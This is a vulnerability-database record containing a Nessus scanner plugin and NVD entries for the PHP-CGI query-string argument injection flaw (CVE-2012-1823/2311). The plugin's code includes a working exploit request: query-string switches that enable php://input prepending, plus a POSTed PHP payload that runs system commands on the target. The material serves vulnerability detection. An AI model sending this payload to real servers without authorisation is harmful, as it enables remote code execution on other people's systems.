{"id": "PHP_CGI_QUERY_STRING_CODE_EXECUTION.NASL", "bulletinFamily": "scanner", "title": "PHP PHP-CGI Query String Parameter Injection Arbitrary Code Execution", "description": "The PHP installation on the remote web server contains a flaw that\ncould allow a remote attacker to pass command-line arguments as part\nof a query string to the PHP-CGI program. This could be abused to\nexecute arbitrary code, reveal PHP source code, cause a system crash,\netc.", "published": "2012-05-14T00:00:00", "modified": "2012-05-14T00:00:00", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:C/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/59088", "reporter": "This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.php.net/ChangeLog-5.php#5.3.13", "http://www.php.net/archive/2012.php#id2012-05-08-1", "https://www-304.ibm.com/support/docview.wss?uid=swg21620314", "http://www.php.net/ChangeLog-5.php#5.4.3", "http://www.nessus.org/u?80589ce8", "http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/"], "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "type": "nessus", "lastseen": "2021-01-20T13:26:22", "edition": 27, "viewCount": 50, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-1823", "CVE-2012-2311"]}, {"type": "threatpost", "idList": ["THREATPOST:9FD19F2ACF1E3C44BAE775A250F1E132", "THREATPOST:4E1049C3C10581837DF71F684CB00683", "THREATPOST:3EEA9D9B7CBDC9687FD961AD1AF59EF5", "THREATPOST:51FB010AA47AEB7BA9A071B3DC8D9989", "THREATPOST:2FB93CCBD166A84F825AED5B7F560EAD", "THREATPOST:A5E5D5921DAB8BB3CACFA91664901B61"]}, {"type": "nessus", "idList": ["SUSE_11_APACHE2-MOD_PHP53-120504.NASL", "OPENSUSE-2012-261.NASL", "DEBIAN_DSA-2465.NASL", "SUSE_APACHE2-MOD_PHP5-8114.NASL", "SUSE_11_APACHE2-MOD_PHP5-120504.NASL", "FREEBSD_PKG_59B68B1E9C7811E1B5E0000C299B62E1.NASL", "FEDORA_2012-7628.NASL", "UBUNTU_USN-1437-1.NASL", "FEDORA_2012-7586.NASL", "FEDORA_2012-7567.NASL"]}, {"type": "fedora", "idList": ["FEDORA:42AD9212FB", "FEDORA:2174220F39", "FEDORA:2FE26212BB", "FEDORA:11BE720F24", "FEDORA:A24AB20F77", "FEDORA:ACED120F82", "FEDORA:A07AD21BF1", "FEDORA:B599720F97", "FEDORA:9729C2155E", "FEDORA:089FC20F0D"]}, {"type": "ubuntu", "idList": ["USN-1437-1"]}, {"type": "openvas", "idList": ["OPENVAS:841002", "OPENVAS:864256", "OPENVAS:864253", "OPENVAS:1361412562310841002", "OPENVAS:1361412562310864262", "OPENVAS:1361412562310864256", "OPENVAS:864259", "OPENVAS:864262", "OPENVAS:850218", "OPENVAS:864257"]}, {"type": "suse", "idList": ["SUSE-SU-2012:0598-1", "OPENSUSE-SU-2012:0590-1", "SUSE-SU-2012:0598-2", "SUSE-SU-2012:0604-1"]}, {"type": "cert", "idList": ["VU:520827"]}, {"type": "freebsd", "idList": ["59B68B1E-9C78-11E1-B5E0-000C299B62E1", "60DE13D5-95F0-11E1-806A-001143CD36D8"]}, {"type": "exploitdb", "idList": ["EDB-ID:29290", "EDB-ID:40233", "EDB-ID:18836", "EDB-ID:29316", "EDB-ID:18834"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2465-1:8EF31"]}, {"type": "canvas", "idList": ["PHP_CGI_REMOTE"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:85B20F0533D328BC2DFA7020D0F11896"]}, {"type": "redhat", "idList": ["RHSA-2012:0570", "RHSA-2012:0546"]}, {"type": "centos", "idList": ["CESA-2012:0546"]}, {"type": "seebug", "idList": ["SSV:72859", "SSV:82805"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:123859", "PACKETSTORM:112477"]}, {"type": "zdt", "idList": ["1337DAY-ID-21429"]}], "modified": "2021-01-20T13:26:22", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-01-20T13:26:22", "rev": 2}, "vulnersScore": 7.6}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59088);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_bugtraq_id(53388);\n script_xref(name:\"CERT\", value:\"520827\");\n script_xref(name:\"EDB-ID\", value:\"18834\");\n\n script_name(english:\"PHP PHP-CGI Query String Parameter Injection Arbitrary Code Execution\");\n script_summary(english:\"Tests to execute arbitrary code\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a version of PHP that allows arbitrary\ncode execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The PHP installation on the remote web server contains a flaw that\ncould allow a remote attacker to pass command-line arguments as part\nof a query string to the PHP-CGI program. This could be abused to\nexecute arbitrary code, reveal PHP source code, cause a system crash,\netc.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/archive/2012.php#id2012-05-08-1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.3.13\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.4.3\");\n # https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_lotus_foundations_php_argument_command_injection_cve_2012_18234?lang=en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?80589ce8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg21620314\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using Lotus Foundations, upgrade the Lotus Foundations operating\nsystem to version 1.2.2b or later. \n\nOtherwise, upgrade to PHP 5.3.13 / 5.4.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nos = get_kb_item(\"Host/OS\");\nfiles = get_kb_list(\"www/\" + port + \"/content/extensions/php*\");\n\nif (isnull(files)) file = \"/index.php\";\nelse\n{\n files = make_list(files);\n file = files[0];\n}\n\n# Try to exploit the issue to run a command.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig /all';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig /all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig /all'] = \"Subnet Mask\";\n\n\nurl = file + \"?\" +\n \"-d allow_url_include=on \"+\n \"-d safe_mode=off \"+\n \"-d suhosin.simulation=on \"+\n \"-d open_basedir=off \"+\n \"-d auto_prepend_file=php://input \" +\n \"-n\";\nurl = str_replace(find:\" \", replace:\"+\", string:url);\nurl = urlencode(\n str:url, \n unreserved:\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.!~*'()-]/?+\"\n);\ntoken = (SCRIPT_NAME - \".nasl\") + \"-\" + unixtime();\n\nforeach cmd (cmds)\n{\n payload = \"<?php echo '\" + token + \"'; system('\" + cmd + \"'); die; ?>\";\n\n res = http_send_recv3(\n port : port,\n method : \"POST\",\n item : url,\n data : payload,\n content_type : \"application/x-www-form-urlencoded\",\n exit_on_fail : TRUE\n );\n\n if (\n token >< res[2] &&\n egrep(pattern:cmd_pats[cmd], string:res[2])\n )\n {\n if (report_verbosity > 0)\n {\n report = \n '\\nNessus was able to verify the issue exists using the following request :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) +\n '\\n' + http_last_sent_request() +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n';\n\n if (report_verbosity > 1)\n {\n output = strstr(res[2], token) - token;\n\n report +=\n '\\n' + 'This produced the following output :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) +\n '\\n' + data_protection::sanitize_uid(output:chomp(output)) +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) + '\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n}\nexit(0, \"The web server listening on port \" + port + \" is not affected.\");\n", "naslFamily": "CGI abuses", "pluginID": "59088", "cpe": ["cpe:/a:php:php"], "scheme": null}

{"cve": [{"lastseen": "2021-02-02T05:59:49", "description": "sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that contain a %3D sequence but no = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823.", "edition": 6, "cvss3": {}, "published": "2012-05-11T10:15:00", "title": "CVE-2012-2311", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2311"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:5.2.12", "cpe:/a:php:php:5.4.1", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.3.4", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:4.4.9", "cpe:/a:php:php:4.0", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:5.3.8", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:5.3.9", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:5.4.0", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:5.3.6", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:5.3.10", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:5.3.5", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:5.3.1", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.2.15", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:5.3.11", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:5.2.13", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:5.3.12", "cpe:/a:php:php:5.3.7", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.2.17", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:5.3.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:2.0b10", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:1.0", "cpe:/a:php:php:5.3.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:5.2.14", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6", "cpe:/a:php:php:5.2.16"], "id": "CVE-2012-2311", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2311", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0b10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:47", "description": "sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.", "edition": 6, "cvss3": {}, "published": "2012-05-11T10:15:00", "title": "CVE-2012-1823", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1823"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:php:php:5.1.5", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:5.2.12", "cpe:/a:php:php:5.4.1", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.3.4", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:5.3.8", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:5.3.9", "cpe:/a:php:php:5.4.0", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:5.3.6", "cpe:/a:php:php:5.3.10", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:5.3.5", "cpe:/a:php:php:5.3.1", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:5.2.15", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:5.3.11", "cpe:/a:php:php:5.2.13", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:5.3.7", "cpe:/a:php:php:5.2.17", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:5.3.2", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:5.3.3", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:5.2.14", "cpe:/a:php:php:5.2.16"], "id": "CVE-2012-1823", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.7:*:*:*:*:*:*:*", 